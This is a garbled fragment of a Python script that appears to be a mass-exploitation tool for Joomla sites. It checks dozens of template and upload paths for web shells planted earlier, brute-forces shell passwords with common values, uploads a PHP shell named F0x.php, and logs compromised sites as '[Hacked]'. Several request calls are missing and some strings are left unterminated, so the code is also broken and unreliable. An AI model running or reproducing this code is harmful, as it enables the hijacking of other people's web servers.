print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>Vuln!! patch it Now!</title>' in requests.get(SH6_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>Vuln!! patch it Now!</title>' in requests.get(SH7_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Tryag File Manager' in requests.get(SH8_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[TryagFileManager]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'config root man' in requests.get(SH9_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[WebShell]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'RxR HaCkEr' in requests.get(SH10_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RxR HaCkEr]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in requests.get(SH12_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[Olux]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH13_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'X_Shell' in requests.get(SH14_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[Hamdida]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'RxR HaCkEr' in requests.get(SH15_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RxR HaCkEr]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'izocin' in requests.get(SH16_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[IZocin]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Dr HeX' in requests.get(SH17_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[DrHeX]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Dr HeX' in requests.get(SH18_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[DrHeX]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<' not in modules_check and '/modules/modules' in modules_check :
upShell =,data=modules_upload,timeout=15)
check = requests.get(site+'/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH11_J2+'#itongtong [POST] | {}/F0x.php [Succeeded]
else :
upShell =,data=modules_upload2,timeout=15)
check = requests.get(site+'/modules/modules/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH11_J2+'#itongtong [POST] | {}/modules/modules/F0x.php [Succeeded]
else :
upShell =,data=modules_upload3,timeout=15)
check = requests.get(site+'/images/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH11_J2+'#itongtong [POST] | {}/images/F0x.php [Succeeded]
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def Joomla1(site):
try :
site = URL(site)
pattern_themes1 = re.compile('templates/(.*)/favicon.ico')
pattern_themes2 = re.compile('templates/(.*)/js/')
pattern_themes3 = re.compile('templates/(.*)/css/')
pattern_themes4 = re.compile('(.*)/')
SH22_J = site+'/up.php'
SH23_J = site+'/upload.php'
SH24_J = site+'/shell.php'
try :
site_check = requests.get(site+'/',timeout=15).content
up_check = requests.get(SH22_J,timeout=15).content
upload_check = requests.get(SH23_J,timeout=15).content
shell_check = requests.get(SH24_J,timeout=15).content
except :
if re.findall(pattern_themes1,site_check):
theme = re.findall(pattern_themes1,site_check)
theme = theme[0]
while re.findall(pattern_themes4,theme) :
theme = re.findall(pattern_themes4,theme)
theme = theme[0]
elif re.findall(pattern_themes2,site_check):
theme = re.findall(pattern_themes2,site_check)
theme = theme[0]
while re.findall(pattern_themes4,theme) :
theme = re.findall(pattern_themes4,theme)
theme = theme[0]
elif re.findall(pattern_themes3,site_check):
theme = re.findall(pattern_themes3,site_check)
theme = theme[0]
while re.findall(pattern_themes4,theme) :
theme = re.findall(pattern_themes4,theme)
theme = theme[0]
else :
theme = 'system'
SH1_J = site+'/administrator/templates/bluestork/index.php'
SH2_J = site+'/administrator/templates/bluestork/error.php'
SH3_J = site+'/administrator/templates/hathor/index.php'
SH4_J = site+'/administrator/templates/hathor/error.php'
SH5_J = site+'/administrator/templates/isis/index.php'
SH6_J = site+'/administrator/templates/isis/error.php'
SH7_J = site+'/templates/beez/index.php'
SH8_J = site+'/templates/ja_purity/index.php'
SH9_J = site+'/templates/rhuk_milkyway/index.php'
SH10_J = site+'/templates/'+theme+'/index.php'
SH11_J = site+'/templates/'+theme+'/error.php'
SH12_J = site+'/templates/beez3/index.php'
SH13_J = site+'/templates/beez3/error.php'
SH14_J = site+'/templates/beez5/index.php'
SH15_J = site+'/templates/beez5/error.php'
SH16_J = site+'/templates/beez_20/index.php'
SH17_J = site+'/templates/beez_20/error.php'
SH18_J = site+'/templates/protostar/index.php'
SH19_J = site+'/templates/protostar/error.php'
SH20_J = site+'/templates/atomic/index.php'
SH21_J = site+'/templates/atomic/error.php'
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
if ' type="file"' in site_check or ' type=\'file\'' in site_check or ' type= "file"' in site_check or ' type= \'file\'' in site_check or ' type = "file"' in site_check or ' type = \'file\'' in site_check or ' type ="file"' in site_check or ' type =\'file\'' in site_check or ' type=file' in site_check or ' type =file' in site_check or ' type= file' in site_check or ' type = file' in site_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('mylogin.txt', mode='a') as ccc:
ccc.write(site+'/ [Register or Contact]
else :
if ' type="file"' in up_check or ' type=\'file\'' in up_check or ' type= "file"' in up_check or ' type= \'file\'' in up_check or ' type = "file"' in up_check or ' type = \'file\'' in up_check or ' type ="file"' in up_check or ' type =\'file\'' in up_check or ' type=file' in up_check or ' type =file' in up_check or ' type= file' in up_check or ' type = file' in up_check or 'Upload</a> ]</li><li>[' in up_check or 'upload</a><li><a>Sym' in up_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH22_J+' [Hacked]
else :
if ' type="file"' in upload_check or ' type=\'file\'' in upload_check or ' type= "file"' in upload_check or ' type= \'file\'' in upload_check or ' type = "file"' in upload_check or ' type = \'file\'' in upload_check or ' type ="file"' in upload_check or ' type =\'file\'' in upload_check or ' type=file' in upload_check or ' type =file' in upload_check or ' type= file' in upload_check or ' type = file' in upload_check or 'Upload</a> ]</li><li>[' in upload_check or 'upload</a><li><a>Sym' in upload_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH23_J+' [Hacked]
else :
if ' type="file"' in shell_check or ' type=\'file\'' in shell_check or ' type= "file"' in shell_check or ' type= \'file\'' in shell_check or ' type = "file"' in shell_check or ' type = \'file\'' in shell_check or ' type ="file"' in shell_check or ' type =\'file\'' in shell_check or ' type=file' in shell_check or ' type =file' in shell_check or ' type= file' in shell_check or ' type = file' in shell_check or 'Upload</a> ]</li><li>[' in shell_check or 'upload</a><li><a>Sym' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
SH1_J_content = requests.get(SH1_J,timeout=15).content
if ' type="file"' in SH1_J_content or ' type=\'file\'' in SH1_J_content or ' type= "file"' in SH1_J_content or ' type= \'file\'' in SH1_J_content or ' type = "file"' in SH1_J_content or ' type = \'file\'' in SH1_J_content or ' type ="file"' in SH1_J_content or ' type =\'file\'' in SH1_J_content or ' type=file' in SH1_J_content or ' type =file' in SH1_J_content or ' type= file' in SH1_J_content or ' type = file' in SH1_J_content or 'Upload</a> ]</li><li>[' in SH1_J_content or 'upload</a><li><a>Sym' in SH1_J_content :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH1_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH2_J_content = requests.get(SH2_J,timeout=15).content
if ' type="file"' in SH2_J_content or ' type=\'file\'' in SH2_J_content or ' type= "file"' in SH2_J_content or ' type= \'file\'' in SH2_J_content or ' type = "file"' in SH2_J_content or ' type = \'file\'' in SH2_J_content or ' type ="file"' in SH2_J_content or ' type =\'file\'' in SH2_J_content or ' type=file' in SH2_J_content or ' type =file' in SH2_J_content or ' type= file' in SH2_J_content or ' type = file' in SH2_J_content or 'Upload</a> ]</li><li>[' in SH2_J_content or 'upload</a><li><a>Sym' in SH2_J_content :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH2_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH3_J_content = requests.get(SH3_J,timeout=15).content
if ' type="file"' in SH3_J_content or ' type=\'file\'' in SH3_J_content or ' type= "file"' in SH3_J_content or ' type= \'file\'' in SH3_J_content or ' type = "file"' in SH3_J_content or ' type = \'file\'' in SH3_J_content or ' type ="file"' in SH3_J_content or ' type =\'file\'' in SH3_J_content or ' type=file' in SH3_J_content or ' type =file' in SH3_J_content or ' type= file' in SH3_J_content or ' type = file' in SH3_J_content or 'Upload</a> ]</li><li>[' in SH3_J_content or 'upload</a><li><a>Sym' in SH3_J_content :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH3_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
